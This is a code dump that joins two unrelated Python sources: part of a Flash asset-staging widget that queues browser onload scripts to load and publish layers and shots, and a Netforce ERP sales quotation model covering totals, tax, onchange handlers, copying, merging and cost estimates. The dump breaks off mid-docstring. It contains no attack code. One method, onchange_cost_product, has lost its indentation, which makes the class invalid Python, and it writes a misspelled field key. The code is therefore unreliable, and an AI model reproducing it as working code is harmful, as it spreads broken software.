        # search object here — FlashAssetFilter applies itself via alter_search
        # elsewhere; confirm against the base class contract.
        return FlashAssetFilter()

    def get_right_filter(my, search):
        filter = FlashEpisodeShotNavigatorFilter()
        filter.add_none_option()
        return filter

    def get_action_cbk(my):
        # Command classes handling the add/remove buttons.
        return ["pyasm.prod.web.LayerInstanceAdderCbk", \
            "pyasm.prod.web.LayerInstanceRemoverCbk"]

    def get_action_wdg(my):
        """Build the action bar: add/remove plus the layer staging button."""
        div = DivWdg(css="filter_box")
        div.add(HtmlElement.b("Action: "))
        add_button = SubmitWdg("Add Assets")
        div.add(add_button)
        remove_button = SubmitWdg("Remove from %s" % my.CONTAINER_NAME)
        div.add(remove_button)
        # add the staging button
        stage_button = SubmitWdg(my.BUTTON_LABEL)
        stage_button.add_style('background-color: #e6edbe')
        div.add(SpanWdg(stage_button, css='large'))
        for cbk in my.get_action_cbk():
            WebContainer.register_cmd(cbk)
        div.add(HiddenWdg(my.LOAD_MODE, 'merge'))
        folderless = HiddenWdg(my.PREFIX_MODE, 'true')
        folderless.set_attr('checked','1')
        div.add(folderless)
        div.add(FlashLayerStageWdg())
        return div
class FlashSObjectStageWdg(Widget):
    ''' This widget draws all the script required for the staging process
    for flash layers.

    It emits browser onload scripts that drive the Flash application:
    load each selected container and its assets, run the stage script,
    then trigger an upload/publish round-trip via AjaxCmd.
    Subclasses override get_publish_command/get_search_type/
    get_checkbox_name/get_container_sobjects for layers vs shots.
    '''
    BUTTON_LABEL = "Populate with Assets"
    LOAD_MODE = "load_mode"

    def check(my):
        # True only when this widget's staging button triggered the submit.
        web = WebContainer.get_web()
        if web.get_form_value(my.BUTTON_LABEL) != "":
            return True

    def get_publish_command(my):
        # Abstract: subclasses return the publish command class path.
        pass

    def get_search_type(my):
        return FlashLayer.SEARCH_TYPE

    def get_checkbox_name(my):
        return LayerCheckboxWdg.CB_NAME

    def get_container_sobjects(my, container):
        """Return the Flash assets referenced by the container's instances."""
        layer_insts = LayerInstance.get_all_by_layer(container)
        asset_codes = SObject.get_values(layer_insts, 'asset_code', unique=True)
        search = Search( FlashAsset.SEARCH_TYPE )
        search.add_filters('code', asset_codes)
        sobjs = search.get_sobjects()
        return sobjs

    def init(my):
        if not my.check():
            return
        my.add(GeneralAppletWdg())
        my.flash = Flash()
        web = WebContainer.get_web()
        # create the necessary hidden widgets which the upload appliet
        # will look at
        search_type_wdg = HiddenWdg("search_type", my.get_search_type())
        my.add(search_type_wdg)
        uploaded_wdg = HiddenWdg(SObjectUploadCmd.FILE_NAMES)
        my.add(uploaded_wdg)
        description = HiddenWdg(SObjectUploadCmd.PUBLISH_COMMENT)
        my.add(description)
        value = uploaded_wdg.get_value()
        # register the command
        WebContainer.register_cmd( my.get_publish_command() )
        # get all of the selected
        selected = web.get_form_values(my.get_checkbox_name())
        if not selected:
            return
        containers = []
        for select in selected:
            container = Search.get_by_search_key(select)
            containers.append(container)
        # close all of the documents in the fl
        BaseAppServer.add_onload_script( my.flash.get_close_docs() )
        use_container = True
        # get the container assets
        for container in containers:
            sobjs = my.get_container_sobjects(container)
            if not sobjs:
                continue
            # start with container.
            if use_container:
                my.add_load_script(container, no_alerts=True)
            for sobj in sobjs:
                my.add_load_script(sobj, no_alerts=True)
            # publish after load
            my.add_stage_script(container)
            my.close_docs()
            BaseAppServer.add_onload_script( \
                "document.form.elements['%s'].value = 'Populate assets in layers [%s]';" % (SObjectUploadCmd.PUBLISH_COMMENT, container.get_code() ) )
        # Kick off the upload/publish round-trip once all containers are staged.
        ajax = AjaxCmd()
        ajax.register_cmd( my.get_publish_command() )
        # FiXME: some privileged knowledge here
        ajax.add_element_name("upload_files")
        ajax.set_option( "search_type", my.get_search_type() )
        BaseAppServer.add_onload_script( ajax.get_on_script() )
        BaseAppServer.add_onload_script("Common.pause(1000);document.form.upload_files.value = '';document.form.submit()")
        #BaseAppServer.add_onload_script("document.form.elements['%s'].value \
        #    = 'Populate assets in layers [%s]'; \
        #    document.form.submit()" % (SObjectUploadCmd.PUBLISH_COMMENT, \
        #    ', '.join(SObject.get_values(containers, 'id', unique=True))))

    def close_docs(my):
        # Queue a script that closes all open documents in the Flash app.
        BaseAppServer.add_onload_script("pyflash.close_docs()")

    def add_load_script(my, sobject, no_alerts=False):
        """Queue the load (or import, for general assets) script for sobject.

        When no_alerts is set, scripts that would only alert an error
        (they start with "alert") are silently dropped.
        """
        script = ''
        if sobject.is_general_asset():
            flash_import = FlashImport(sobject)
            flash_import.set_load_msg_id('')
            script = flash_import.get_stage_script()
        else:
            flash_load = FlashLoad(sobject)
            flash_load.set_load_msg_id('')
            script = flash_load.get_script()
        if no_alerts and script.startswith("alert"):
            return
        BaseAppServer.add_onload_script(script)

    def add_stage_script(my, container):
        '''rename the layers in flash and publish it as a new version
        of this layer'''
        flash_stage = FlashStage(container)
        stage_script = flash_stage.get_script()
        BaseAppServer.add_onload_script( stage_script )
class FlashLayerStageWdg(FlashSObjectStageWdg):
    """Staging widget specialization for layers."""

    def get_publish_command(my):
        return "pyasm.flash.FlashLayerPublishCmd"

    def get_search_type(my):
        return FlashLayer.SEARCH_TYPE

    def get_checkbox_name(my):
        return LayerCheckboxWdg.CB_NAME

    def get_container_sobjects(my, container):
        # Assets referenced by the layer's instances.
        layer_insts = LayerInstance.get_all_by_layer(container)
        asset_codes = SObject.get_values(layer_insts, 'asset_code', unique=True)
        search = Search( FlashAsset.SEARCH_TYPE )
        search.add_filters('code', asset_codes)
        sobjs = search.get_sobjects()
        return sobjs


class FlashShotStageWdg(FlashSObjectStageWdg):
    """Staging widget specialization for shots."""

    def get_publish_command(my):
        return "pyasm.flash.FlashShotPublishCmd"

    def get_search_type(my):
        return FlashShot.SEARCH_TYPE

    def get_checkbox_name(my):
        return ShotCheckboxWdg.CB_NAME

    def get_container_sobjects(my, container):
        # Assets referenced by the shot's instances.
        layer_insts = ShotInstance.get_all_by_shot(container)
        asset_codes = SObject.get_values(layer_insts, 'asset_code', unique=True)
        search = Search( FlashAsset.SEARCH_TYPE )
        search.add_filters('code', asset_codes)
        sobjs = search.get_sobjects()
        return sobjs
| epl-1.0 |
nfco/netforce | netforce_sale/netforce_sale/models/sale_quot.py | 2 | 28079 | # Copyright (c) 2012-2015 Netforce Co. Ltd.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
# OR OTHER DEALINGS IN THE SOFTWARE.
from netforce.model import Model, fields, get_model
from netforce.utils import get_data_path
from netforce.database import get_active_db
import time
import uuid
from netforce.access import get_active_company, set_active_user, get_active_user
from . import utils
from decimal import *
class SaleQuot(Model):
    """Sales quotation.

    Lifecycle: draft -> waiting_approval -> approved -> won/lost
    (or revised when copied to a new revision).  Approved quotations
    can be converted to sale orders via copy_to_sale_order().
    """
    _name = "sale.quot"
    _string = "Quotation"
    _audit_log = True
    _name_field = "number"
    _key = ["number"]
    _multi_company = True
    _fields = {
        "number": fields.Char("Number", required=True, search=True),
        "ref": fields.Char("Ref", search=True),
        "contact_id": fields.Many2One("contact", "Contact", required=True, search=True),
        "date": fields.Date("Date", required=True, search=True),
        "exp_date": fields.Date("Valid Until"),
        # Stored function field: see get_state() for the won-override logic.
        "state": fields.Selection([("draft", "Draft"), ("waiting_approval", "Awaiting Approval"), ("approved", "Approved"), ("won", "Won"), ("lost", "Lost"), ("revised", "Revised")], "Status", function="get_state", store=True),
        "lines": fields.One2Many("sale.quot.line", "quot_id", "Lines"),
        # Stored amounts computed by get_amount().
        "amount_subtotal": fields.Decimal("Subtotal", function="get_amount", function_multi=True, store=True),
        "amount_tax": fields.Decimal("Tax Amount", function="get_amount", function_multi=True, store=True),
        "amount_total": fields.Decimal("Total", function="get_amount", function_multi=True, store=True),
        "amount_total_words": fields.Char("Total Words", function="get_amount_total_words"),
        "qty_total": fields.Decimal("Total", function="get_qty_total"),
        "currency_id": fields.Many2One("currency", "Currency", required=True),
        "opport_id": fields.Many2One("sale.opportunity", "Opportunity", search=True),
        "user_id": fields.Many2One("base.user", "Owner", search=True),
        "tax_type": fields.Selection([["tax_ex", "Tax Exclusive"], ["tax_in", "Tax Inclusive"], ["no_tax", "No Tax"]], "Tax Type", required=True),
        "sales": fields.One2Many("sale.order", "quot_id", "Sales Orders"),
        "payment_terms": fields.Text("Payment Terms"),
        "other_info": fields.Text("Other Information"),
        "comments": fields.One2Many("message", "related_id", "Comments"),
        "activities": fields.One2Many("activity", "related_id", "Activities"),
        "documents": fields.One2Many("document", "related_id", "Documents"),
        # Used to build the public view link (see view_link()).
        "uuid": fields.Char("UUID"),
        "price_list_id": fields.Many2One("price.list", "Price List"),
        "emails": fields.One2Many("email.message", "related_id", "Emails"),
        "company_id": fields.Many2One("company", "Company"),
        "related_id": fields.Reference([["issue", "Issue"]], "Related To"),
        "ship_term_id": fields.Many2One("ship.term", "Shipping Terms"),
        "sequence_id": fields.Many2One("sequence", "Number Sequence"),
        "job_template_id": fields.Many2One("job.template", "Service Order Template"),
        "lost_sale_code_id": fields.Many2One("reason.code", "Lost Sale Reason Code", condition=[["type", "=", "lost_sale"]]),
        # Aggregates / SQL helper fields for reporting.
        "agg_amount_total": fields.Decimal("Total Amount", agg_function=["sum", "amount_total"]),
        "agg_amount_subtotal": fields.Decimal("Total Amount w/o Tax", agg_function=["sum", "amount_subtotal"]),
        "year": fields.Char("Year", sql_function=["year", "date"]),
        "quarter": fields.Char("Quarter", sql_function=["quarter", "date"]),
        "month": fields.Char("Month", sql_function=["month", "date"]),
        "week": fields.Char("Week", sql_function=["week", "date"]),
        # Estimated costing (see get_est_profit / create_est_costs).
        "est_costs": fields.One2Many("quot.cost","quot_id","Costs"),
        "est_cost_amount": fields.Float("Estimated Cost Amount", function="get_est_profit", function_multi=True),
        "est_profit_amount": fields.Float("Estimated Profit Amount", function="get_est_profit", function_multi=True),
        "est_margin_percent": fields.Float("Estimated Margin %", function="get_est_profit", function_multi=True),
        "currency_rates": fields.One2Many("custom.currency.rate","related_id","Currency Rates"),
    }

    def _get_number(self, context={}):
        """Default for "number": next unused value from the sale_quot sequence.

        Runs the uniqueness check as the admin user (id 1) so record-level
        permissions cannot hide an existing number.
        """
        seq_id = get_model("sequence").find_sequence(type="sale_quot")
        if not seq_id:
            return None
        while 1:
            num = get_model("sequence").get_next_number(seq_id, context=context)
            if not num:
                return None
            user_id = get_active_user()
            set_active_user(1)
            res = self.search([["number", "=", num]])
            set_active_user(user_id)
            if not res:
                return num
            # Number collided with an existing quotation: advance the sequence.
            get_model("sequence").increment_number(seq_id, context=context)

    def _get_currency(self, context={}):
        # Default currency: the company-wide currency from settings.
        settings = get_model("settings").browse(1)
        return settings.currency_id.id

    _defaults = {
        "state": "draft",
        "date": lambda *a: time.strftime("%Y-%m-%d"),
        "number": _get_number,
        "currency_id": _get_currency,
        "tax_type": "tax_ex",
        "user_id": lambda self, context: get_active_user(),
        "uuid": lambda *a: str(uuid.uuid4()),
        "company_id": lambda *a: get_active_company(),
    }
    _constraints = ["check_fields"]
    _order = "date desc"
    def check_fields(self, ids, context={}):
        """Constraint: a quotation submitted or approved must have lines."""
        for obj in self.browse(ids):
            if obj.state in ("waiting_approval", "approved"):
                if not obj.lines:
                    raise Exception("No lines in quotation")

    def create(self, vals, **kw):
        # Recompute stored function fields immediately after creation.
        id = super().create(vals, **kw)
        self.function_store([id])
        return id

    def write(self, ids, vals, **kw):
        """Write, then refresh stored fields on this quot and any linked
        opportunities (collected BEFORE the write in case the link changes)."""
        opport_ids = []
        for obj in self.browse(ids):
            if obj.opport_id:
                opport_ids.append(obj.opport_id.id)
        super().write(ids, vals, **kw)
        if opport_ids:
            get_model("sale.opportunity").function_store(opport_ids)
        self.function_store(ids)

    def function_store(self, ids, field_names=None, context={}):
        # Propagate stored-field recomputation to linked opportunities.
        super().function_store(ids, field_names, context)
        opport_ids = []
        for obj in self.browse(ids):
            if obj.opport_id:
                opport_ids.append(obj.opport_id.id)
        if opport_ids:
            get_model("sale.opportunity").function_store(opport_ids)
    def get_amount(self, ids, context={}):
        """Compute amount_subtotal / amount_tax / amount_total per quotation.

        Hidden sub-lines (line.is_hidden) are skipped — their amounts are
        already rolled up into their parent line.  For tax-inclusive
        quotations the tax portion is subtracted from the subtotal.
        """
        res = {}
        for obj in self.browse(ids):
            vals = {}
            subtotal = 0
            tax = 0
            for line in obj.lines:
                if line.is_hidden:
                    continue
                if line.tax_id:
                    line_tax = get_model("account.tax.rate").compute_tax(
                        line.tax_id.id, line.amount, tax_type=obj.tax_type)
                else:
                    line_tax = 0
                tax += line_tax
                if obj.tax_type == "tax_in":
                    subtotal += (line.amount or 0) - line_tax
                else:
                    subtotal += line.amount or 0
            vals["amount_subtotal"] = subtotal
            vals["amount_tax"] = tax
            vals["amount_total"] = subtotal + tax
            res[obj.id] = vals
        return res

    def get_qty_total(self, ids, context={}):
        """Sum of line quantities per quotation (0 when there are no lines)."""
        res = {}
        for obj in self.browse(ids):
            qty = sum([line.qty for line in obj.lines])
            res[obj.id] = qty or 0
        return res

    def submit_for_approval(self, ids, context={}):
        """Move draft quotations to waiting_approval and fire the trigger."""
        for obj in self.browse(ids):
            if obj.state != "draft":
                raise Exception("Invalid state")
            obj.write({"state": "waiting_approval"})
        self.trigger(ids, "submit_for_approval")

    def approve(self, ids, context={}):
        """Approve quotations that are draft or awaiting approval."""
        for obj in self.browse(ids):
            if obj.state not in ("draft", "waiting_approval"):
                raise Exception("Invalid state")
            obj.write({"state": "approved"})
    def update_amounts(self, context):
        """Recompute line amounts and quotation totals in the onchange data.

        Multi-pass algorithm (order matters):
          1. per-line amount = qty * unit_price minus percentage discount;
          2. collect "hide_sub" parent sequences;
          3. mark children of those parents hidden and accumulate their
             amounts into the parent's total (child sequences are dotted
             extensions of the parent sequence, e.g. "1.2" under "1");
          4. overwrite each hide_sub parent's amount/unit_price with the
             rolled-up total;
          5. sum visible lines into amount_subtotal/amount_tax
             (tax-inclusive quotes subtract the tax portion).
        """
        print("update_amounts")
        data = context["data"]
        data["amount_subtotal"] = 0
        data["amount_tax"] = 0
        tax_type = data["tax_type"]
        # Pass 1: raw per-line amounts with discount applied.
        for line in data["lines"]:
            if not line:
                continue
            amt = (line.get("qty") or 0) * (line.get("unit_price") or 0)
            if line.get("discount"):
                # discount is a percentage of the line amount
                disc = amt * line["discount"] / Decimal(100)
                amt -= disc
            else:
                disc = 0
            line["amount"] = amt
        # Pass 2: sequences whose sub-lines should be hidden/rolled up.
        hide_parents=[]
        for line in data["lines"]:
            if not line:
                continue
            if line.get("sequence") and line.get("hide_sub"):
                hide_parents.append(line["sequence"])
        # Pass 3: mark hidden children and total them per parent.
        is_hidden={}
        hide_totals={}
        for line in data["lines"]:
            if not line:
                continue
            if not line.get("sequence"):
                continue
            parent_seq=None
            for seq in hide_parents:
                if line["sequence"].startswith(seq+"."):
                    parent_seq=seq
                    break
            if parent_seq:
                is_hidden[line["sequence"]]=True
                hide_totals.setdefault(parent_seq,0)
                hide_totals[parent_seq]+=line["amount"]
        # Pass 4: parents take over their children's rolled-up amount.
        for line in data["lines"]:
            if not line:
                continue
            if line.get("sequence") and line.get("hide_sub"):
                line["amount"]=hide_totals.get(line["sequence"],0)
                if line["qty"]:
                    line["unit_price"]=line["amount"]/line["qty"]
        # Pass 5: totals over visible lines only.
        for line in data["lines"]:
            if is_hidden.get(line.get("sequence")):
                continue
            tax_id = line.get("tax_id")
            if tax_id:
                tax = get_model("account.tax.rate").compute_tax(tax_id, line["amount"], tax_type=tax_type)
                data["amount_tax"] += tax
            else:
                tax = 0
            if tax_type == "tax_in":
                data["amount_subtotal"] += line["amount"] - tax
            else:
                data["amount_subtotal"] += line["amount"]
        data["amount_total"] = data["amount_subtotal"] + data["amount_tax"]
        return data
    def onchange_product(self, context):
        """Onchange for a line's product: fill description, margin, qty=1,
        UoM, price (price list first, falling back to the product's sale
        price) and sales tax, then recompute totals."""
        data = context["data"]
        contact_id = data.get("contact_id")
        if contact_id:
            contact = get_model("contact").browse(contact_id)
        else:
            contact = None
        path = context["path"]
        line = get_data_path(data, path, parent=True)
        prod_id = line.get("product_id")
        if not prod_id:
            return {}
        prod = get_model("product").browse(prod_id)
        line["description"] = prod.description
        line["est_margin_percent_input"] = prod.gross_profit
        line["qty"] = 1
        if prod.uom_id is not None:
            line["uom_id"] = prod.uom_id.id
        pricelist_id = data["price_list_id"]
        price = None
        if pricelist_id:
            # Price list price (in the price list's currency).
            price = get_model("price.list").get_price(pricelist_id, prod.id, 1)
            price_list = get_model("price.list").browse(pricelist_id)
            price_currency_id = price_list.currency_id.id
        if price is None:
            # Fallback: product sale price in the company currency.
            price = prod.sale_price
            settings = get_model("settings").browse(1)
            price_currency_id = settings.currency_id.id
        if price is not None:
            # Convert into the quotation currency.
            currency_id = data["currency_id"]
            price_cur = get_model("currency").convert(price, price_currency_id, currency_id)
            line["unit_price"] = price_cur
        if prod.sale_tax_id is not None:
            line["tax_id"] = prod.sale_tax_id.id
        data = self.update_amounts(context)
        return data

    def onchange_qty(self, context):
        """Onchange for a line's qty: set a price (qty-dependent price list
        lookup, then product sale price) only when the line has none yet,
        then recompute totals."""
        data = context["data"]
        path = context["path"]
        line = get_data_path(data, path, parent=True)
        prod_id = line.get("product_id")
        if not prod_id:
            return {}
        prod = get_model("product").browse(prod_id)
        pricelist_id = data["price_list_id"]
        qty = line["qty"]
        if line.get("unit_price") is None:
            price = None
            if pricelist_id:
                price = get_model("price.list").get_price(pricelist_id, prod.id, qty)
                price_list = get_model("price.list").browse(pricelist_id)
                price_currency_id = price_list.currency_id.id
            if price is None:
                price = prod.sale_price
                settings = get_model("settings").browse(1)
                price_currency_id = settings.currency_id.id
            if price is not None:
                currency_id = data["currency_id"]
                price_cur = get_model("currency").convert(price, price_currency_id, currency_id)
                line["unit_price"] = price_cur
        data = self.update_amounts(context)
        return data

    def onchange_contact(self, context):
        """Onchange for the contact: pull payment terms, price list and
        currency (contact currency, else company default)."""
        data = context["data"]
        contact_id = data.get("contact_id")
        if not contact_id:
            return {}
        contact = get_model("contact").browse(contact_id)
        data["payment_terms"] = contact.payment_terms
        data["price_list_id"] = contact.sale_price_list_id.id
        if contact.currency_id:
            data["currency_id"] = contact.currency_id.id
        else:
            settings = get_model("settings").browse(1)
            data["currency_id"] = settings.currency_id.id
        return data

    def onchange_uom(self, context):
        """Onchange for a line's UoM: rescale the product sale price by the
        UoM ratio relative to the product's base UoM, then recompute."""
        data = context["data"]
        path = context["path"]
        line = get_data_path(data, path, parent=True)
        prod_id = line.get("product_id")
        if not prod_id:
            return {}
        prod = get_model("product").browse(prod_id)
        uom_id = line.get("uom_id")
        if not uom_id:
            return {}
        uom = get_model("uom").browse(uom_id)
        if prod.sale_price is not None:
            line["unit_price"] = prod.sale_price * uom.ratio / prod.uom_id.ratio
        data = self.update_amounts(context)
        return data
    def copy(self, ids, context):
        """Duplicate the first selected quotation (lines included) and open
        the copy.  The copy's "ref" records the source number.

        NOTE(review): obj.opport_id.id is read unconditionally — presumably
        the ORM returns a null-safe browse record for empty many2ones;
        confirm against the framework behavior.
        """
        obj = self.browse(ids)[0]
        vals = {
            "ref": obj.number,
            "contact_id": obj.contact_id.id,
            "currency_id": obj.currency_id.id,
            "tax_type": obj.tax_type,
            "payment_terms": obj.payment_terms,
            "other_info": obj.other_info,
            "exp_date": obj.exp_date,
            "opport_id": obj.opport_id.id,
            "lines": [],
        }
        for line in obj.lines:
            line_vals = {
                "product_id": line.product_id.id,
                "description": line.description,
                "qty": line.qty,
                "uom_id": line.uom_id.id,
                "unit_price": line.unit_price,
                "discount": line.discount,
                "tax_id": line.tax_id.id,
            }
            vals["lines"].append(("create", line_vals))
        new_id = self.create(vals, context=context)
        new_obj = self.browse(new_id)
        return {
            "next": {
                "name": "quot",
                "mode": "form",
                "active_id": new_id,
            },
            "flash": "Quotation %s copied from %s" % (new_obj.number, obj.number),
        }

    def revise(self, ids, context):
        """Copy the quotation and mark the original as revised."""
        obj = self.browse(ids)[0]
        res = self.copy(ids, context)
        obj.write({"state": "revised"})
        return res
    def copy_to_sale_order(self,ids,context):
        """Convert the quotation into a sale order.

        Copies header data, lines (skipping incomplete ones), estimated
        costs and currency-rate overrides.  Hidden roll-up lines are copied
        with zero price/discount and no tax so totals are not double counted.
        Returns an action opening the new sale order.
        """
        id=ids[0]
        obj=self.browse(id)
        sale_vals={
            "ref": obj.number,
            "quot_id": obj.id,
            "contact_id": obj.contact_id.id,
            "currency_id": obj.currency_id.id,
            "tax_type": obj.tax_type,
            "lines": [],
            "user_id": obj.user_id.id,
            "other_info": obj.other_info,
            "payment_terms": obj.payment_terms,
            "price_list_id": obj.price_list_id.id,
            "job_template_id": obj.job_template_id.id,
            "est_costs": [],
            "currency_rates": [],
        }
        for line in obj.lines:
            # Skip lines missing qty, UoM or price: not orderable as-is.
            if not line.qty or not line.uom_id or not line.unit_price:
                continue
            prod=line.product_id
            line_vals={
                "sequence": line.sequence,
                "product_id": prod.id,
                "description": line.description,
                "qty": line.qty,
                "uom_id": line.uom_id.id,
                # Hidden sub-lines carry no monetary value on the order.
                "unit_price": line.unit_price if not line.is_hidden else 0,
                "discount": line.discount if not line.is_hidden else 0,
                "tax_id": line.tax_id.id if not line.is_hidden else None,
                "location_id": prod.location_id.id if prod else None,
            }
            sale_vals["lines"].append(("create",line_vals))
        for cost in obj.est_costs:
            cost_vals={
                "sequence": cost.sequence,
                "product_id": cost.product_id.id,
                "description": cost.description,
                "supplier_id": cost.supplier_id.id,
                "list_price": cost.list_price,
                "purchase_price": cost.purchase_price,
                "purchase_duty_percent": cost.purchase_duty_percent,
                "purchase_ship_percent": cost.purchase_ship_percent,
                "landed_cost": cost.landed_cost,
                "qty": cost.qty,
                "currency_id": cost.currency_id.id,
            }
            sale_vals["est_costs"].append(("create",cost_vals))
        for r in obj.currency_rates:
            rate_vals={
                "currency_id": r.currency_id.id,
                "rate": r.rate,
            }
            sale_vals["currency_rates"].append(("create",rate_vals))
        sale_id=get_model("sale.order").create(sale_vals,context=context)
        sale=get_model("sale.order").browse(sale_id)
        return {
            "next": {
                "name": "sale",
                "mode": "form",
                "active_id": sale_id,
            },
            "flash": "Sale order %s created from quotation %s"%(sale.number,obj.number)
        }
    def do_won(self, ids, context={}):
        """Mark approved quotations as won."""
        for obj in self.browse(ids):
            assert obj.state == "approved"
            obj.write({"state": "won"})

    def do_lost(self, ids, context={}):
        """Mark approved quotations as lost."""
        for obj in self.browse(ids):
            assert obj.state == "approved"
            obj.write({"state": "lost"})

    def do_reopen(self, ids, context={}):
        """Return won/lost quotations to approved."""
        for obj in self.browse(ids):
            assert obj.state in ("won", "lost")
            obj.write({"state": "approved"})

    def get_state(self, ids, context={}):
        """Stored-state function: an approved quotation with a confirmed or
        done sale order is reported as won."""
        vals = {}
        for obj in self.browse(ids):
            state = obj.state
            if state == "approved":
                found = False
                for sale in obj.sales:
                    if sale.state in ("confirmed", "done"):
                        found = True
                        break
                if found:
                    state = "won"
            vals[obj.id] = state
        return vals

    def view_link(self, ids, context={}):
        """Return an action opening the public (uuid-keyed) quotation view."""
        obj = self.browse(ids)[0]
        uuid = obj.uuid
        dbname = get_active_db()
        return {
            "next": {
                "type": "url",
                "url": "/view_quot?dbname=%s&uuid=%s" % (dbname, uuid),
            }
        }
    def get_template_quot_form(self, ids, context={}):
        """Pick the print template: the discount variant when any line
        carries a discount, otherwise the plain form."""
        obj = self.browse(ids)[0]
        has_discount=False
        for line in obj.lines:
            if line.discount:
                has_discount=True
        if has_discount:
            return "quot_form_disc"
        else:
            return "quot_form"

    def to_draft(self, ids, context={}):
        """Reset the quotation to draft."""
        obj = self.browse(ids)[0]
        obj.write({"state": "draft"})

    def get_amount_total_words(self, ids, context={}):
        """Function field: amount_total spelled out in words."""
        vals = {}
        for obj in self.browse(ids):
            amount_total_words = utils.num2word(obj.amount_total)
            vals[obj.id] = amount_total_words
        return vals

    def onchange_sequence(self, context={}):
        """Onchange for the number sequence: assign the next unused number
        from the selected sequence (advancing past collisions)."""
        data = context["data"]
        seq_id = data["sequence_id"]
        if not seq_id:
            return None
        while 1:
            num = get_model("sequence").get_next_number(seq_id, context=context)
            res = self.search([["number", "=", num]])
            if not res:
                break
            get_model("sequence").increment_number(seq_id, context=context)
        data["number"] = num
        return data
def onchange_cost_product(self,context):
data=context["data"]
path=context["path"]
line=get_data_path(data,path,parent=True)
prod_id=line.get("product_id")
if prod_id:
prod=get_model("product").browse(prod_id)
line["description"]=prod.name
line["list_price"]=prod.purchase_price
line["purchase_price"]=prod.purchase_price
line["landed_cost"]=prod.landed_cost
line["qty"]=1
line["uom_id"]=prod.uom_id.id
line["currency_id"]=prod.purchase_currency_id.id
line["purchase_duty_percent"]=prod.purchase_duty_percent
line["purchase_ship_percent"]=prod.purchase_ship_percent
line["landed_cost"]=prod.landed_cost
line["purcase_price"]=prod.purchase_price
if prod.suppliers:
line["supplier_id"]=prod.suppliers[0].supplier_id.id
return data
    def get_est_profit(self, ids, context={}):
        """Function field: estimated cost, profit and margin per quotation.

        cost   = sum of per-line estimated costs,
        profit = subtotal - cost,
        margin = profit as a percentage of the subtotal (None when the
                 subtotal is zero, avoiding division by zero).
        """
        vals = {}
        for obj in self.browse(ids):
            cost=0
            for line in obj.lines:
                cost+=line.est_cost_amount or 0
            profit = (obj.amount_subtotal or 0) - cost
            margin=profit*100/obj.amount_subtotal if obj.amount_subtotal else None
            vals[obj.id] = {
                "est_cost_amount": cost,
                "est_profit_amount": profit,
                "est_margin_percent": margin,
            }
        return vals

    def create_est_costs(self,ids,context={}):
        """Regenerate product-based estimated cost lines from the quotation
        lines.  Only product-linked cost lines are deleted first, so
        manually entered (product-less) costs survive.  Lines without a
        product, purchase price or sequence, and bundle products, are
        skipped."""
        obj=self.browse(ids[0])
        del_ids=[]
        for cost in obj.est_costs:
            if cost.product_id:
                del_ids.append(cost.id)
        get_model("quot.cost").delete(del_ids)
        #obj.write({"est_costs":[("delete_all",)]})
        for line in obj.lines:
            prod=line.product_id
            if not prod:
                continue
            if not prod.purchase_price:
                continue
            if not line.sequence:
                continue
            if "bundle" == prod.type:
                continue
            vals={
                "quot_id": obj.id,
                # Hidden sub-lines attach their cost to the parent sequence.
                "sequence": line.sequence if not line.is_hidden else line.parent_sequence,
                "product_id": prod.id,
                "description": prod.name,
                "supplier_id": prod.suppliers[0].supplier_id.id if prod.suppliers else None,
                "list_price": prod.purchase_price,
                "purchase_price": prod.purchase_price,
                "landed_cost": prod.landed_cost,
                "purchase_duty_percent": prod.purchase_duty_percent,
                "purchase_ship_percent": prod.purchase_ship_percent,
                "qty": line.qty,
                "currency_id": prod.purchase_currency_id.id,
            }
            get_model("quot.cost").create(vals)
    def merge_quotations(self,ids,context={}):
        """Merge two or more quotations into a new one.

        All source quotations must share the same contact, currency and tax
        type.  Lines are renumbered with a fresh running sequence; estimated
        costs follow their line via a per-quotation sequence map.  Returns
        an action opening the merged quotation.
        """
        if len(ids)<2:
            raise Exception("Can not merge less than two quotations")
        contact_ids=[]
        currency_ids=[]
        tax_types=[]
        for obj in self.browse(ids):
            contact_ids.append(obj.contact_id.id)
            currency_ids.append(obj.currency_id.id)
            tax_types.append(obj.tax_type)
        contact_ids=list(set(contact_ids))
        currency_ids=list(set(currency_ids))
        tax_types=list(set(tax_types))
        if len(contact_ids)>1:
            raise Exception("Quotation customers have to be the same")
        if len(currency_ids)>1:
            raise Exception("Quotation currencies have to be the same")
        if len(tax_types)>1:
            raise Exception("Quotation tax types have to be the same")
        vals = {
            "contact_id": contact_ids[0],
            "currency_id": currency_ids[0],
            "tax_type": tax_types[0],
            "lines": [],
            "est_costs": [],
        }
        seq=0
        for obj in self.browse(ids):
            # old sequence -> new merged sequence, per source quotation
            seq_map={}
            for line in obj.lines:
                seq+=1
                seq_map[line.sequence]=seq
                line_vals = {
                    "sequence": seq,
                    "product_id": line.product_id.id,
                    "description": line.description,
                    "qty": line.qty,
                    "uom_id": line.uom_id.id,
                    "unit_price": line.unit_price,
                    "discount": line.discount,
                    "tax_id": line.tax_id.id,
                }
                vals["lines"].append(("create", line_vals))
            for cost in obj.est_costs:
                cost_vals={
                    "sequence": seq_map.get(cost.sequence),
                    "product_id": cost.product_id.id,
                    "description": cost.description,
                    "supplier_id": cost.supplier_id.id,
                    "list_price": cost.list_price,
                    "purchase_price": cost.purchase_price,
                    "landed_cost": cost.landed_cost,
                    "qty": cost.qty,
                    "currency_id": cost.currency_id.id,
                }
                vals["est_costs"].append(("create",cost_vals))
        new_id = self.create(vals, context=context)
        new_obj = self.browse(new_id)
        return {
            "next": {
                "name": "quot",
                "mode": "form",
                "active_id": new_id,
            },
            "flash": "Quotations merged",
        }
    def onchange_est_margin(self,context={}):
        """Onchange for a line's target margin %: back-calculate the unit
        price so that cost / price yields the requested margin.

        NOTE(review): a margin of 100 would divide by zero and a qty of 0
